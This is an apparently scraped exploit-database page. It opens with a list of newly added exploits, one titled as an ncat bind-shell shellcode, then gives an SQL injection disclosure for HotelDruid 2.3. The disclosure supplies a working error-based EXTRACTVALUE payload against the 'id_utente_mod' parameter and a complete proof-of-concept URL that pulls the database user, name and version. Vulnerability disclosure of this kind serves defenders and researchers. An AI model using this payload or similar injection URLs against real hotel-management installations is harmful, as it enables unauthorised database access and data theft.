
21 changes to exploits/shellcodes SmartFTP Client 9.0.2623.0 - Denial of Service (PoC) LanSpy 2.0.1.159 - Local Buffer Overflow (PoC) XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection McAfee True Key - McAfee.TrueKey.Service Privilege Escalation DomainMOD 4.11.01 - Cross-Site Scripting DomainMOD 4.11.01 - 'raid' Cross-Site Scripting Tourism Website Blog - Remote Code Execution / SQL Injection Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery PrestaShop 1.6.x/1.7.x - Remote Code Execution DomainMOD 4.11.01 - Cross-Site Scripting PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion TP-Link wireless router Archer C1200 - Cross-Site Scripting Huawei B315s-22 - Information Leak ZTE ZXHN H168N - Improper Access Restrictions Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure IceWarp Mail Server 11.0.0.0 - Cross-Site Scripting Apache OFBiz 16.11.05 - Cross-Site Scripting HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection ThinkPHP 5.0.23/5.1.31 - Remote Code Execution Adobe ColdFusion 2018 - Arbitrary File Upload Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes)
20 lines
No EOL
914 B
Text
20 lines
No EOL
914 B
Text
# Exploit Title: SQL Injection in HotelDruid version 2.3
|
|
# Google Dork: N/A
|
|
# Date: 9-12-2018
|
|
# Exploit Author: Sainadh Jamalpur
|
|
# Vendor Homepage: http://www.hoteldruid.com
|
|
# Software Link: https://sourceforge.net/projects/hoteldruid/
|
|
# Version: 2.3 (REQUIRED)
|
|
# Tested on: Windows x64/ Kali linux x64
|
|
# CVE : N/A
|
|
|
|
Description:
|
|
Hoteldruid is an open source program for hotel management (property
|
|
management software) developed by DigitalDruid.Net
|
|
Vulnerability Description:
|
|
the "id_utente_mod" parameter is Vulnerable to SQL Injection Vulnerability.
|
|
Payload:
|
|
1' AND EXTRACTVALUE(5,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT
|
|
(ELT(5=5,1)))))-- -
|
|
|
|
Poc: http://hoteldruid/gestione_utenti.php?anno=2018&id_sessione=&modifica_gruppi=SI&id_utente_mod=1%27%20AND%20EXTRACTVALUE(5,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT%20(ELT(5=5,1)))))--%20%20- |